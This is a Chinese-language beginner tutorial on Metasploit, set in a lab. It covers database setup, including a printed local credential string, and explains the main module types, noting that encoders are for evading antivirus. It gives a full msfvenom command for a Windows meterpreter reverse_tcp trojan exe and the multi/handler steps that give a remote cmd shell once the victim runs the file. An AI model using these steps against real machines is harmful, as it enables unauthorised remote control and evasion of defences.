metasploit的使用

目录

一、msf基本操作 1

二、msf模块(比较重要的四个) 2

三、木马生成 2

四、开启监听模块(最常用的模块) 3

一、msf基本操作

1. 使用msfconsole进入msf控制台界面

2. 在控制台使用msfdb init初始化数据库(创建数据库),这边由于我之前操作过一次所以显示已经开启了,msfdb start开启数据库,然后在命令行模式下开启开机自启动数据库(systemctl enable postgresql) ,然后开启数据库服务(service postgresql start)

3. 查看数据库密码


cat /usr/share/metasploit-framework/config/database.yml

4. 数据库连接(这里我已经连接)


db_connect msf:GVHrg3O3nC+alIbSYoAmq5kQn2lGpuRm0x2DjhjIa4A=@127.0.0.1/msf

二、msf模块(比较重要的四个)

渗透模块(exploit):这是一段程序,运行时会利用目标的安全漏洞进行攻击。

攻击载荷(payload):在成功对目标完成一次渗透之后,这段程序开始在目标计算机上运行。它能帮助我们在目标系统上获得需要的访问和行动权限。

辅助模块(auxiliary):包含了一系列的辅助支持模块,包括扫描模块、fuzz测试漏洞发掘模块、网络协议欺骗以及其他一些模块。

编码模块(encoder):编码器模块通常用来对攻击模块进行代码混淆,来逃过目标安全保护机制的检测。目标安全保护机制包括杀毒软件和防火墙等。

个人理解:用辅助模块查找发现漏洞,发现漏洞用渗透模块对漏洞进行攻击,成功渗透进去后将存放在传输器(stage)的攻击载荷通过传输体(stager)传输到目标机器上面,运行,获得权限;编码模块是用来对攻击载荷的木马进行封装逃避杀毒软件和防火墙。

三、木马生成

1. 使用msfvenom生成木马


msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.227.129 LPORT=4444 -f exe -o hello.exe

-p:payload 设置payload

-a:architecture(结构) 设置系统位数 x86 | x64     不写默认x86

--platform   设置平台 windows | linux

-e:encoder(编码) 设置编码

-i:iteration(迭代) 编码偏移次数

-f:format(格式) 文件格式

-o:output 输出文件

--list | -l 查看指令详细信息,如:msfvenom --list e

常用的payload

windows/x64/meterpreter/reverse_tcp

windows/x64/meterpreter/reverse_tcp_rc4

windows/x64/meterpreter/bind_tcp

windows/x64/meterpreter/bind_tcp_rc4

windows/x64/meterpreter/reverse_https

windows/x64/meterpreter/reverse_http

理解:因为采用的是反向连接所有这边木马要带上本机的操作地址和监听的端口号,这边假如有些-a的话,那windows/后面就需要跟上-a 带的数比如-a x64 就要windows/x64

/meterpreter

四、开启监听模块(最常用的模块)

1. 配置监听模块


use exploit/multi/handler

2. 设置payload


set payload windows/meterpreter/reverse_tcp     这里需要跟木马的-p一样

3. 查看参数


show options                查看参数

LHOST ip   本机IP地址

LPORT 4444 本机端口

4. 设置参数信息LHOST(ip)和LPORT(端口)


set LHOST 192.168.227.129

set LPORT 4444

5. 开启监听


exploit或者run        开启监听

6. windows电脑双击exe文件,kali就可以是使用windows的cmd了

最新文章

  1. TypeScript中的枚举类型
  2. mysql 总结二(自定义存储过程)
  3. SparkContext的初始化(叔篇)——TaskScheduler的启动
  4. Sublime Text 使用技巧
  5. android获取当前行所属类和所属方法名
  6. 蓝牙的AVDTP协议笔记
  7. 并发容器之CopyOnWriteArrayList(转载)
  8. fscanf函数
  9. Linux下Wireshark普通用户不能获取网络接口问题
  10. 基本文件的I/O
  11. Qt+SQLite数据加密的一种思路(内存数据库)
  12. POJ1273_Drainage Ditches(网络流)
  13. “Dynamic Web Module 3.0 requires Java 1.6 or newer.”错误 (转别人)
  14. ReactiveCocoa源码解析(六) SignalProtocol的take(first)与collect()延展实现
  15. ●BZOJ 4596 [Shoi2016]黑暗前的幻想乡
  16. 修改SQL数据库中表字段类型时,报“一个或多个对象访问此列”错误的解决方法
  17. 【Redis】LRU算法和Redis的LRU实现
  18. Spring源码学习-容器BeanFactory(五) Bean的创建-探寻Bean的新生之路
  19. IO的详细解释:It's all about buffers: zero-copy, mmap and Java NIO
  20. 获取数值型数组的平均值(分别使用增强for循环和普通for循环)

热门文章

  1. 【转载】可能是世界上最牛逼的网站统计程序——Matomo
  2. 【Office-Word妙手回春】Word文本秒转表格
  3. 配置DVWA漏洞环境
  4. DDOS、CC、sql注入,跨站攻击防御方法
  5. Markdown语法及使用方法完整手册
  6. 如何给LG gram写一个Linux下的驱动?
  7. PHP之Trait详解 转
  8. win安装appium
  9. 如何高效定义和验证restful请求的参数
  10. CSS中-moz、-ms、-webkit、-o的意思